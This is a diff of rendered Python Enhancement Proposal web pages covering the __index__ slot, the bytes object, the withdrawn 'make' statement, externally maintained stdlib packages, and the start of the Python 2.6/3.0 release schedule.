  13. Add the operator.index(x) function.
  14. +
  15. Alter arrayobject.c and mmapmodule.c to use the new C-API for their +sub-scripting and other needs.
  16. +
  17. Add unit-tests
  18. +
+
+
+

Discussion Questions

+
+

Speed

+

Implementation should not slow down Python because integers and long +integers used as indexes will complete in the same number of +instructions. The only change will be that what used to generate +an error will now be acceptable.

+
+
+

Why not use nb_int which is already there?

+

The nb_int method is used for coercion and so means something +fundamentally different than what is requested here. This PEP +proposes a method by which something that can already be thought of +as an integer can communicate that information to Python when it +needs an integer. The biggest example of why using nb_int would be a +bad thing is that float objects already define the nb_int method, but +float objects should not be used as indexes in a sequence.

+
+
+

Why the name __index__?

+

Some questions were raised regarding the name __index__ when other +interpretations of the slot are possible. For example, the slot +can be used any time Python requires an integer internally (such +as in "mystring" * 3). The name was suggested by Guido because +slicing syntax is the biggest reason for having such a slot and +in the end no better name emerged. See the discussion thread [1] +for examples of names that were suggested such as “__discrete__” and +“__ordinal__”.

+
+
+

Why return PyObject * from nb_index?

+

Initially Py_ssize_t was selected as the return type for the +nb_index slot. However, this led to an inability to track and +distinguish overflow and underflow errors without ugly and brittle +hacks. As the nb_index slot is used in at least 3 different ways +in the Python core (to get an integer, to get a slice end-point, +and to get a sequence index), there is quite a bit of flexibility +needed to handle all these cases. The importance of having the +necessary flexibility to handle all the use cases is critical. +For example, the initial implementation that returned Py_ssize_t for +nb_index led to the discovery that on a 32-bit machine with >=2GB of RAM +s = 'x' * (2**100) works but len(s) was clipped at 2147483647. +Several fixes were suggested but eventually it was decided that +nb_index needed to return a Python Object similar to the nb_int +and nb_long slots in order to handle overflow correctly.

+
+
+

Why can’t __index__ return any object with the nb_index method?

+

This would allow infinite recursion in many different ways that are not +easy to check for. This restriction is similar to the requirement that +__nonzero__ return an int or a bool.

+
+
+
+

Reference Implementation

+

Submitted as patch 1436368 to SourceForge.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0357.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0358/index.html b/pep-0358/index.html new file mode 100644 index 00000000000..9b267da9d70 --- /dev/null +++ b/pep-0358/index.html @@ -0,0 +1,372 @@ + + + + + + + + PEP 358 – The “bytes” Object | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 358 – The “bytes” Object

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2006
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Update

+

This PEP has partially been superseded by PEP 3137.

+
+
+

Abstract

+

This PEP outlines the introduction of a raw bytes sequence type. +Adding the bytes type is one step in the transition to +Unicode-based str objects which will be introduced in Python 3.0.

+

The PEP describes how the bytes type should work in Python 2.6, as +well as how it should work in Python 3.0. (Occasionally there are +differences because in Python 2.6, we have two string types, str +and unicode, while in Python 3.0 we will only have one string +type, whose name will be str but whose semantics will be like the +2.6 unicode type.)

+
+
+

Motivation

+

Python’s current string objects are overloaded. They serve to hold +both sequences of characters and sequences of bytes. This +overloading of purpose leads to confusion and bugs. In future +versions of Python, string objects will be used for holding +character data. The bytes object will fulfil the role of a byte +container. Eventually the unicode type will be renamed to str +and the old str type will be removed.

+
+
+

Specification

+

A bytes object stores a mutable sequence of integers that are in +the range 0 to 255. Unlike string objects, indexing a bytes +object returns an integer. Assigning or comparing an object that +is not an integer to an element causes a TypeError exception. +Assigning an element to a value outside the range 0 to 255 causes +a ValueError exception. The .__len__() method of bytes returns +the number of integers stored in the sequence (i.e. the number of +bytes).
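An illustrative interactive session for these semantics (the exact error messages shown are made up for the sketch):
>>> b = bytes([65, 66, 67])
+>>> len(b)
+3
+>>> b[0]          # indexing returns an integer, not a length-1 bytes
+65
+>>> b[0] = 256    # outside the range 0 to 255
+ValueError: byte value out of range
+>>> b[0] = 'A'    # not an integer
+TypeError: an integer is required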

+

The constructor of the bytes object has the following signature:

+
bytes([initializer[, encoding]])
+
+
+

If no arguments are provided then a bytes object containing zero +elements is created and returned. The initializer argument can be +a string (in 2.6, either str or unicode), an iterable of integers, +or a single integer. The pseudo-code for the constructor +(optimized for clear semantics, not for speed) is:

+
def bytes(initializer=0, encoding=None):
+    if isinstance(initializer, int): # In 2.6, int -> (int, long)
+        initializer = [0]*initializer
+    elif isinstance(initializer, basestring):
+        if isinstance(initializer, unicode): # In 3.0, "if True"
+            if encoding is None:
+                # In 3.0, raise TypeError("explicit encoding required")
+                encoding = sys.getdefaultencoding()
+            initializer = initializer.encode(encoding)
+        initializer = [ord(c) for c in initializer]
+    else:
+        if encoding is not None:
+            raise TypeError("no encoding allowed for this initializer")
+        tmp = []
+        for c in initializer:
+            if not isinstance(c, int):
+                raise TypeError("initializer must be iterable of ints")
+            if not 0 <= c < 256:
+                raise ValueError("initializer element out of range")
+            tmp.append(c)
+        initializer = tmp
+    new = <new bytes object of length len(initializer)>
+    for i, c in enumerate(initializer):
+        new[i] = c
+    return new
+
+
+

The .__repr__() method returns a string that can be evaluated to +generate a new bytes object containing a bytes literal:

+
>>> bytes([10, 20, 30])
+b'\n\x14\x1e'
+
+
+

The object has a .decode() method equivalent to the .decode() +method of the str object. The object has a classmethod .fromhex() +that takes a string of characters from the set [0-9a-fA-F ] and +returns a bytes object (similar to binascii.unhexlify). For +example:

+
>>> bytes.fromhex('5c5350ff')
+b'\\SP\xff'
+>>> bytes.fromhex('5c 53 50 ff')
+b'\\SP\xff'
+
+
+

The object has a .hex() method that does the reverse conversion +(similar to binascii.hexlify):

+
>>> bytes([92, 83, 80, 255]).hex()
+'5c5350ff'
+
+
+

The bytes object has some methods similar to list methods, and +others similar to str methods. Here is a complete list of +methods, with their approximate signatures:

+
.__add__(bytes) -> bytes
+.__contains__(int | bytes) -> bool
+.__delitem__(int | slice) -> None
+.__delslice__(int, int) -> None
+.__eq__(bytes) -> bool
+.__ge__(bytes) -> bool
+.__getitem__(int | slice) -> int | bytes
+.__getslice__(int, int) -> bytes
+.__gt__(bytes) -> bool
+.__iadd__(bytes) -> bytes
+.__imul__(int) -> bytes
+.__iter__() -> iterator
+.__le__(bytes) -> bool
+.__len__() -> int
+.__lt__(bytes) -> bool
+.__mul__(int) -> bytes
+.__ne__(bytes) -> bool
+.__reduce__(...) -> ...
+.__reduce_ex__(...) -> ...
+.__repr__() -> str
+.__reversed__() -> bytes
+.__rmul__(int) -> bytes
+.__setitem__(int | slice, int | iterable[int]) -> None
+.__setslice__(int, int, iterable[int]) -> None
+.append(int) -> None
+.count(int) -> int
+.decode(str) -> str | unicode # in 3.0, only str
+.endswith(bytes) -> bool
+.extend(iterable[int]) -> None
+.find(bytes) -> int
+.index(bytes | int) -> int
+.insert(int, int) -> None
+.join(iterable[bytes]) -> bytes
+.partition(bytes) -> (bytes, bytes, bytes)
+.pop([int]) -> int
+.remove(int) -> None
+.replace(bytes, bytes) -> bytes
+.rindex(bytes | int) -> int
+.rpartition(bytes) -> (bytes, bytes, bytes)
+.split(bytes) -> list[bytes]
+.startswith(bytes) -> bool
+.reverse() -> None
+.rfind(bytes) -> int
+.rindex(bytes | int) -> int
+.rsplit(bytes) -> list[bytes]
+.translate(bytes, [bytes]) -> bytes
+
+
+

Note the conspicuous absence of .isupper(), .upper(), and friends. +(But see “Open Issues” below.) There is no .__hash__() because +the object is mutable. There is no use case for a .sort() method.

+

The bytes type also supports the buffer interface, supporting +reading and writing binary (but not character) data.

+
+
+

Out of Scope Issues

+
    +
  • Python 3k will have a much different I/O subsystem. Deciding +how that I/O subsystem will work and interact with the bytes +object is out of the scope of this PEP. The expectation however +is that binary I/O will read and write bytes, while text I/O +will read strings. Since the bytes type supports the buffer +interface, the existing binary I/O operations in Python 2.6 will +support bytes objects.
  • +
  • It has been suggested that a special method named .__bytes__() +be added to the language to allow objects to be converted into +byte arrays. This decision is out of scope.
  • +
  • A bytes literal of the form b"..." is also proposed. This is +the subject of PEP 3112.
  • +
+
+
+

Open Issues

+
    +
  • The .decode() method is redundant since a bytes object b can +also be decoded by calling unicode(b, <encoding>) (in 2.6) or +str(b, <encoding>) (in 3.0). Do we need encode/decode methods +at all? In a sense the spelling using a constructor is cleaner.
  • +
  • Need to specify the methods still more carefully.
  • +
  • Pickling and marshalling support need to be specified.
  • +
  • Should all those list methods really be implemented?
  • +
  • A case could be made for supporting .ljust(), .rjust(), +.center() with a mandatory second argument.
  • +
  • A case could be made for supporting .split() with a mandatory +argument.
  • +
  • A case could even be made for supporting .islower(), .isupper(), +.isspace(), .isalpha(), .isalnum(), .isdigit() and the +corresponding conversions (.lower() etc.), using the ASCII +definitions for letters, digits and whitespace. If this is +accepted, the cases for .ljust(), .rjust(), .center() and +.split() become much stronger, and they should have default +arguments as well, using an ASCII space or all ASCII whitespace +(for .split()).
  • +
+
+
+

Frequently Asked Questions

+

Q: Why have the optional encoding argument when the encode method of +Unicode objects does the same thing?

+

A: In the current version of Python, the encode method returns a str +object and we cannot change that without breaking code. The +construct bytes(s.encode(...)) is expensive because it has to +copy the byte sequence multiple times. Also, Python generally +provides two ways of converting an object of type A into an +object of type B: ask an A instance to convert itself to a B, or +ask the type B to create a new instance from an A. Depending on +what A and B are, both APIs make sense; sometimes reasons of +decoupling require that A can’t know about B, in which case you +have to use the latter approach; sometimes B can’t know about A, +in which case you have to use the former.

+

Q: Why does bytes ignore the encoding argument if the initializer is +a str? (This only applies to 2.6.)

+

A: There is no sane meaning that the encoding can have in that case. +str objects are byte arrays and they know nothing about the +encoding of character data they contain. We need to assume that +the programmer has provided a str object that already uses the +desired encoding. If you need something other than a pure copy of +the bytes then you need to first decode the string. For example:

+
bytes(s.decode(encoding1), encoding2)
+
+
+

Q: Why not have the encoding argument default to Latin-1 (or some +other encoding that covers the entire byte range) rather than +ASCII?

+

A: The system default encoding for Python is ASCII. It seems least +confusing to use that default. Also, in Py3k, using Latin-1 as +the default might not be what users expect. For example, they +might prefer a Unicode encoding. Any default will not always +work as expected. At least ASCII will complain loudly if you try +to encode non-ASCII data.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0358.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0359/index.html b/pep-0359/index.html new file mode 100644 index 00000000000..b553491e576 --- /dev/null +++ b/pep-0359/index.html @@ -0,0 +1,707 @@ + + + + + + + + PEP 359 – The “make” Statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 359 – The “make” Statement

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Apr-2006
+
Python-Version:
+
2.6
+
Post-History:
+
05-Apr-2006, 06-Apr-2006, 13-Apr-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a generalization of the class-declaration syntax, +the make statement. The proposed syntax and semantics parallel +the syntax for class definition, and so:

+
make <callable> <name> <tuple>:
+    <block>
+
+
+

is translated into the assignment:

+
<name> = <callable>("<name>", <tuple>, <namespace>)
+
+
+

where <namespace> is the dict created by executing <block>. +This is mostly syntactic sugar for:

+
class <name> <tuple>:
+    __metaclass__ = <callable>
+    <block>
+
+
+

and is intended to help more clearly express the intent of the +statement when something other than a class is being created. Of +course, other syntax for such a statement is possible, but it is hoped +that by keeping a strong parallel to the class statement, an +understanding of how classes and metaclasses work will translate into +an understanding of how the make-statement works as well.

+

The PEP is based on a suggestion [1] from Michele Simionato on the +python-dev list.

+
+
+

Withdrawal Notice

+

This PEP was withdrawn at Guido’s request [2]. Guido didn’t like it, +and in particular didn’t like how the property use-case puts the +instance methods of a property at a different level than other +instance methods and requires fixed names for the property functions.

+
+
+

Motivation

+

Class statements provide two nice facilities to Python:

+
    +
  1. They execute a block of statements and provide the resulting +bindings as a dict to the metaclass.
  2. +
  3. They encourage DRY (don’t repeat yourself) by allowing the class +being created to know the name it is being assigned.
  4. +
+

Thus in a simple class statement like:

+
class C(object):
+    x = 1
+    def foo(self):
+        return 'bar'
+
+
+

the metaclass (type) gets called with something like:

+
C = type('C', (object,), {'x':1, 'foo':<function foo at ...>})
+
+
+

The class statement is just syntactic sugar for the above assignment +statement, but clearly a very useful sort of syntactic sugar. It +avoids not only the repetition of C, but also simplifies the +creation of the dict by allowing it to be expressed as a series of +statements.

+

Historically, type instances (a.k.a. class objects) have been the +only objects blessed with this sort of syntactic support. The make +statement aims to extend this support to other sorts of objects where +such syntax would also be useful.

+
+

Example: simple namespaces

+

Let’s say I have some attributes in a module that I access like:

+
mod.thematic_roletype
+mod.opinion_roletype
+
+mod.text_format
+mod.html_format
+
+
+

and since “Namespaces are one honking great idea”, I’d like to be able +to access these attributes instead as:

+
mod.roletypes.thematic
+mod.roletypes.opinion
+
+mod.format.text
+mod.format.html
+
+
+

I currently have two main options:

+
    +
  1. Turn the module into a package, turn roletypes and format +into submodules, and move the attributes to the submodules.
  2. +
  3. Create roletypes and format classes, and move the +attributes to the classes.
  4. +
+

The former is a fair chunk of refactoring work, and produces two tiny +modules without much content. The latter keeps the attributes local +to the module, but creates classes when there is no intention of ever +creating instances of those classes.

+

In situations like this, it would be nice to simply be able to declare +a “namespace” to hold the few attributes. With the new make +statement, I could introduce my new namespaces with something like:

+
make namespace roletypes:
+    thematic = ...
+    opinion = ...
+
+make namespace format:
+    text = ...
+    html = ...
+
+
+

and keep my attributes local to the module without making classes that +are never intended to be instantiated. One definition of namespace +that would make this work is:

+
class namespace(object):
+    def __init__(self, name, args, kwargs):
+        self.__dict__.update(kwargs)
+
+
+

Given this definition, at the end of the make-statements above, +roletypes and format would be namespace instances.

+
+
+

Example: GUI objects

+

In GUI toolkits, objects like frames and panels are often associated +with attributes and functions. With the make-statement, code that +looks something like:

+
root = Tkinter.Tk()
+frame = Tkinter.Frame(root)
+frame.pack()
+def say_hi():
+    print "hi there, everyone!"
+hi_there = Tkinter.Button(frame, text="Hello", command=say_hi)
+hi_there.pack(side=Tkinter.LEFT)
+root.mainloop()
+
+
+

could be rewritten to group the Button’s function with its +declaration:

+
root = Tkinter.Tk()
+frame = Tkinter.Frame(root)
+frame.pack()
+make Tkinter.Button hi_there(frame):
+    text = "Hello"
+    def command():
+        print "hi there, everyone!"
+hi_there.pack(side=Tkinter.LEFT)
+root.mainloop()
+
+
+
+
+

Example: custom descriptors

+

Since descriptors are used to customize access to an attribute, it’s +often useful to know the name of that attribute. Current Python +doesn’t give an easy way to find this name and so a lot of custom +descriptors, like Ian Bicking’s setonce descriptor [3], have to hack +around this somehow. With the make-statement, you could create a +setonce attribute like:

+
class A(object):
+    ...
+    make setonce x:
+        "A's x attribute"
+    ...
+
+
+

where the setonce descriptor would be defined like:

+
class setonce(object):
+
+    def __init__(self, name, args, kwargs):
+        self._name = '_setonce_attr_%s' % name
+        self.__doc__ = kwargs.pop('__doc__', None)
+
+    def __get__(self, obj, type=None):
+        if obj is None:
+            return self
+        return getattr(obj, self._name)
+
+    def __set__(self, obj, value):
+        try:
+            getattr(obj, self._name)
+        except AttributeError:
+            setattr(obj, self._name, value)
+        else:
+            raise AttributeError("Attribute already set")
+
+    def set(self, obj, value):
+        setattr(obj, self._name, value)
+
+    def __delete__(self, obj):
+        delattr(obj, self._name)
+
+
+

Note that unlike the original implementation, the private attribute +name is stable since it uses the name of the descriptor, and therefore +instances of class A are pickleable.

+
+
+

Example: property namespaces

+

Python’s property type takes three function arguments and a docstring +argument which, though relevant only to the property, must be declared +before it and then passed as arguments to the property call, e.g.:

+
class C(object):
+    ...
+    def get_x(self):
+        ...
+    def set_x(self):
+        ...
+    x = property(get_x, set_x, "the x of the frobulation")
+
+
+

This issue has been brought up before, and Guido [4] and others [5] +have briefly mused over alternate property syntaxes to make declaring +properties easier. With the make-statement, the following syntax +could be supported:

+
class C(object):
+    ...
+    make block_property x:
+        '''The x of the frobulation'''
+        def fget(self):
+            ...
+        def fset(self):
+            ...
+
+
+

with the following definition of block_property:

+
def block_property(name, args, block_dict):
+    fget = block_dict.pop('fget', None)
+    fset = block_dict.pop('fset', None)
+    fdel = block_dict.pop('fdel', None)
+    doc = block_dict.pop('__doc__', None)
+    assert not block_dict
+    return property(fget, fset, fdel, doc)
+
+
+
+
+

Example: interfaces

+

Guido [6] and others have occasionally suggested introducing +interfaces into python. Most suggestions have offered syntax along +the lines of:

+
interface IFoo:
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

but since there is currently no way in Python to declare an interface +in this manner, most implementations of Python interfaces use class +objects instead, e.g. Zope’s:

+
class IFoo(Interface):
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

With the new make-statement, these interfaces could instead be +declared as:

+
make Interface IFoo:
+    """Foo blah blah"""
+
+    def fumble(name, count):
+        """docstring"""
+
+
+

which makes the intent (that this is an interface, not a class) much +clearer.

+
+
+
+

Specification

+

Python will translate a make-statement:

+
make <callable> <name> <tuple>:
+    <block>
+
+
+

into the assignment:

+
<name> = <callable>("<name>", <tuple>, <namespace>)
+
+
+

where <namespace> is the dict created by executing <block>. +The <tuple> expression is optional; if not present, an empty tuple +will be assumed.

+

A patch is available implementing these semantics [7].
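As a concrete sketch of this translation, using the namespace callable defined under Motivation above (the attribute names and values are illustrative):
make namespace config:
+    host = "localhost"
+    port = 8080
+
+# ...which the compiler treats as the assignment:
+config = namespace("config", (), {'host': "localhost", 'port': 8080})
+assert config.host == "localhost"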

+

The make-statement introduces a new keyword, make. Thus in Python +2.6, the make-statement will have to be enabled using from +__future__ import make_statement.

+
+
+

Open Issues

+
+

Keyword

+

Does the make keyword break too much code? Originally, the make +statement used the keyword create (a suggestion due to Alyssa +Coghlan). However, investigations into the standard library [8] and +Zope+Plone code [9] revealed that create would break a lot more +code, so make was adopted as the keyword instead. However, there +are still a few instances where make would break code. Is there a +better keyword for the statement?

+

Some possible keywords and their counts in the standard library (plus +some installed packages):

+
    +
  • make - 2 (both in tests)
  • +
  • create - 19 (including existing function in imaplib)
  • +
  • build - 83 (including existing class in distutils.command.build)
  • +
  • construct - 0
  • +
  • produce - 0
  • +
+
+
+

The make-statement as an alternate constructor

+

Currently, there are not many functions which have the signature +(name, args, kwargs). That means that something like:

+
make dict params:
+    x = 1
+    y = 2
+
+
+

is currently impossible because the dict constructor has a different +signature. Does this sort of thing need to be supported? One +suggestion, by Carl Banks, would be to add a __make__ magic method +that if found would be called instead of __call__. For types, +the __make__ method would be identical to __call__ and thus +unnecessary, but dicts could support the make-statement by defining a +__make__ method on the dict type that looks something like:

+
def __make__(cls, name, args, kwargs):
+    return cls(**kwargs)
+
+
+

Of course, rather than adding another magic method, the dict type +could just grow a classmethod something like dict.fromblock that +could be used like:

+
make dict.fromblock params:
+    x = 1
+    y = 2
+
+
+

So the question is, will many types want to use the make-statement as +an alternate constructor? And if so, does that alternate constructor +need to have the same name as the original constructor?

+
+
+

Customizing the dict in which the block is executed

+

Should users of the make-statement be able to determine in which dict +object the code is executed? This would allow the make-statement to +be used in situations where a normal dict object would not suffice, +e.g. if order and repeated names must be allowed. Allowing this sort +of customization could allow XML to be written without repeating +element names, and with nesting of make-statements corresponding to +nesting of XML elements:

+
make Element html:
+    make Element body:
+        text('before first h1')
+        make Element h1:
+            attrib(style='first')
+            text('first h1')
+            tail('after first h1')
+        make Element h1:
+            attrib(style='second')
+            text('second h1')
+            tail('after second h1')
+
+
+

If the make-statement tried to get the dict in which to execute its +block by calling the callable’s __make_dict__ method, the +following code would allow the make-statement to be used as above:

+
class Element(object):
+
+    class __make_dict__(dict):
+
+        def __init__(self, *args, **kwargs):
+            self._super = super(Element.__make_dict__, self)
+            self._super.__init__(*args, **kwargs)
+            self.elements = []
+            self.text = None
+            self.tail = None
+            self.attrib = {}
+
+        def __getitem__(self, name):
+            try:
+                return self._super.__getitem__(name)
+            except KeyError:
+                if name in ['attrib', 'text', 'tail']:
+                    return getattr(self, 'set_%s' % name)
+                else:
+                    return globals()[name]
+
+        def __setitem__(self, name, value):
+            self._super.__setitem__(name, value)
+            self.elements.append(value)
+
+        def set_attrib(self, **kwargs):
+            self.attrib = kwargs
+
+        def set_text(self, text):
+            self.text = text
+
+        def set_tail(self, text):
+            self.tail = text
+
+    def __new__(cls, name, args, edict):
+        get_element = etree.ElementTree.Element
+        result = get_element(name, attrib=edict.attrib)
+        result.text = edict.text
+        result.tail = edict.tail
+        for element in edict.elements:
+            result.append(element)
+        return result
+
+
+

Note, however, that the code to support this is somewhat fragile – +it has to magically populate the namespace with attrib, text +and tail, and it assumes that every name binding inside the make +statement body is creating an Element. As it stands, this code would +break with the introduction of a simple for-loop to any one of the +make-statement bodies, because the for-loop would bind a name to a +non-Element object. This could be worked around by adding some sort +of isinstance check or attribute examination, but this still results +in a somewhat fragile solution.

+

It has also been pointed out that the with-statement can provide +equivalent nesting with a much more explicit syntax:

+
with Element('html') as html:
+    with Element('body') as body:
+        body.text = 'before first h1'
+        with Element('h1', style='first') as h1:
+            h1.text = 'first h1'
+            h1.tail = 'after first h1'
+        with Element('h1', style='second') as h1:
+            h1.text = 'second h1'
+            h1.tail = 'after second h1'
+
+
+

And if the repetition of the element names here is too much of a DRY +violation, it is also possible to eliminate all as-clauses except for +the first by adding a few methods to Element. [10]

+

So are there real use-cases for executing the block in a dict of a +different type? And if so, should the make-statement be extended to +support them?

+
+
+
+

Optional Extensions

+
+

Remove the make keyword

+

It might be possible to remove the make keyword so that such +statements would begin with the callable being called, e.g.:

+
namespace ns:
+    badger = 42
+    def spam():
+        ...
+
+interface C(...):
+    ...
+
+
+

However, almost all other Python statements begin with a keyword, and +removing the keyword would make it harder to look up this construct in +the documentation. Additionally, this would add some complexity in +the grammar and so far I (Steven Bethard) have not been able to +implement the feature without the keyword.

+
+
+

Removing __metaclass__ in Python 3000

+

As a side-effect of its generality, the make-statement mostly +eliminates the need for the __metaclass__ attribute in class +objects. Thus in Python 3000, instead of:

+
class <name> <bases-tuple>:
+    __metaclass__ = <metaclass>
+    <block>
+
+
+

metaclasses could be supported by using the metaclass as the callable +in a make-statement:

+
make <metaclass> <name> <bases-tuple>:
+    <block>
+
+
+

Removing the __metaclass__ hook would simplify the BUILD_CLASS +opcode a bit.

+
+
+

Removing class statements in Python 3000

+

In the most extreme application of make-statements, the class +statement itself could be deprecated in favor of make type +statements.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0359.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0360/index.html b/pep-0360/index.html new file mode 100644 index 00000000000..6a9c100c8c3 --- /dev/null +++ b/pep-0360/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 360 – Externally Maintained Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 360 – Externally Maintained Packages

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
30-May-2006
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

No new modules are to be added to this PEP. It has been +deemed dangerous to codify external maintenance of any +code checked into Python’s code repository. Code +contributors should expect Python’s development +methodology to be used for any and all code checked into +Python’s code repository.

+
+
+

Abstract

+

There are many great pieces of Python software developed outside of +the Python standard library (a.k.a., the “stdlib”). Sometimes it +makes sense to incorporate these externally maintained packages into +the stdlib in order to fill a gap in the tools provided by Python.

+

But by having the packages maintained externally it means Python’s +developers do not have direct control over the packages’ evolution and +maintenance. Some package developers prefer to have bug reports and +patches go through them first instead of being directly applied to +Python’s repository.

+

This PEP is meant to record details of packages in the stdlib that are +maintained outside of Python’s repository. Specifically, it is meant +to keep track of any specific maintenance needs for each package. It +should be mentioned that changes needed in order to fix bugs and keep +the code running on all of Python’s supported platforms will be done +directly in Python’s repository without worrying about going through +the contact developer. This is so that Python itself is not held up +by a single bug and allows the whole process to scale as needed.

+

It also is meant to allow people to know which version of a package is +released with which version of Python.

+
+
+

Externally Maintained Packages

+

The section title is the name of the package as it is known outside of +the Python standard library. The “standard library name” is what the +package is named within Python. The “contact person” is the Python +developer in charge of maintaining the package. The “synchronisation +history” lists what external version of the package was included in +each version of Python (if different from the previous Python +release).

+
+

ElementTree

+
+
Web site:
+
http://effbot.org/zone/element-index.htm
+
Standard library name:
+
xml.etree
+
Contact person:
+
Fredrik Lundh
+
+

Fredrik has ceded ElementTree maintenance to the core Python development +team [1].

+
+
+

Expat XML parser

+
+
Web site:
+
http://www.libexpat.org/
+
Standard library name:
+
N/A (this refers to the parser itself, and not the Python +bindings)
+
Contact person:
+
None
+
+
+
+

Optik

+
+
Web site:
+
http://optik.sourceforge.net/
+
Standard library name:
+
optparse
+
Contact person:
+
Greg Ward
+
+

External development seems to have ceased. For new applications, optparse +itself has been largely superseded by argparse.

+
+
+

wsgiref

+
+
Web site:
+
None
+
Standard library name:
+
wsgiref
+
Contact Person:
+
Phillip J. Eby
+
+

This module is maintained in the standard library, but significant bug +reports and patches should pass through the Web-SIG mailing list +[2] for discussion.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0360.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0361/index.html b/pep-0361/index.html new file mode 100644 index 00000000000..9fcaf98fdda --- /dev/null +++ b/pep-0361/index.html @@ -0,0 +1,372 @@ + + + + + + + + PEP 361 – Python 2.6 and 3.0 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 361 – Python 2.6 and 3.0 Release Schedule

+
+
Author:
+
Neal Norwitz, Barry Warsaw
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
29-Jun-2006
+
Python-Version:
+
2.6, 3.0
+
Post-History:
+
17-Mar-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.6 and 3.0. The schedule primarily concerns itself with +PEP-sized items. Small features may be added up to and including +the first beta release. Bugs may be fixed until the final +release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The releases are planned for October 2008.

+

Python 2.6 is not only the next advancement in the Python 2 series, it is also a transitional release, helping developers begin to prepare their code for Python 3.0. As such, many features are being backported from Python 3.0 to 2.6. Thus, it makes sense to release both versions at the same time. The precedent for this was set with the Python 1.6 and 2.0 releases.

+

Until rc, we will be releasing Python 2.6 and 3.0 in lockstep, on +a monthly release cycle. The releases will happen on the first +Wednesday of every month through the beta testing cycle. Because +Python 2.6 is ready sooner, and because we have outside deadlines +we’d like to meet, we’ve decided to split the rc releases. Thus +Python 2.6 final is currently planned to come out two weeks before +Python 3.0 final.

+
+
+

Release Manager and Crew

+
    +
  • 2.6/3.0 Release Manager: Barry Warsaw
  • +
  • Windows installers: Martin v. Loewis
  • +
  • Mac installers: Ronald Oussoren
  • +
  • Documentation: Georg Brandl
  • +
  • RPMs: Sean Reifschneider
  • +
+
+
+

Release Lifespan

+

Python 3.0 is no longer being maintained for any purpose.

+

Python 2.6.9 is the final security-only source-only maintenance +release of the Python 2.6 series. With its release on October 29, +2013, all official support for Python 2.6 has ended. Python 2.6 +is no longer being maintained for any purpose.

+
+
+

Release Schedule

+
    +
  • Feb 29 2008: Python 2.6a1 and 3.0a3 are released
  • +
  • Apr 02 2008: Python 2.6a2 and 3.0a4 are released
  • +
  • May 08 2008: Python 2.6a3 and 3.0a5 are released
  • +
  • Jun 18 2008: Python 2.6b1 and 3.0b1 are released
  • +
  • Jul 17 2008: Python 2.6b2 and 3.0b2 are released
  • +
  • Aug 20 2008: Python 2.6b3 and 3.0b3 are released
  • +
  • Sep 12 2008: Python 2.6rc1 is released
  • +
  • Sep 17 2008: Python 2.6rc2 and 3.0rc1 released
  • +
  • Oct 01 2008: Python 2.6 final released
  • +
  • Nov 06 2008: Python 3.0rc2 released
  • +
  • Nov 21 2008: Python 3.0rc3 released
  • +
  • Dec 03 2008: Python 3.0 final released
  • +
  • Dec 04 2008: Python 2.6.1 final released
  • +
  • Apr 14 2009: Python 2.6.2 final released
  • +
  • Oct 02 2009: Python 2.6.3 final released
  • +
  • Oct 25 2009: Python 2.6.4 final released
  • +
  • Mar 19 2010: Python 2.6.5 final released
  • +
  • Aug 24 2010: Python 2.6.6 final released
  • +
  • Jun 03 2011: Python 2.6.7 final released (security-only)
  • +
  • Apr 10 2012: Python 2.6.8 final released (security-only)
  • +
  • Oct 29 2013: Python 2.6.9 final released (security-only)
  • +
+
+
+

Completed features for 3.0

+

See PEP 3000 and PEP 3100 for details on the +Python 3.0 project.

+
+
+

Completed features for 2.6

+

PEPs:

+
    +
  • PEP 352: Raising a string exception now triggers a TypeError. +Attempting to catch a string exception raises DeprecationWarning. +BaseException.message has been deprecated.
  • +
  • PEP 358: The “bytes” Object
  • +
  • PEP 366: Main module explicit relative imports
  • +
  • PEP 370: Per user site-packages directory
  • +
  • PEP 3112: Bytes literals in Python 3000
  • +
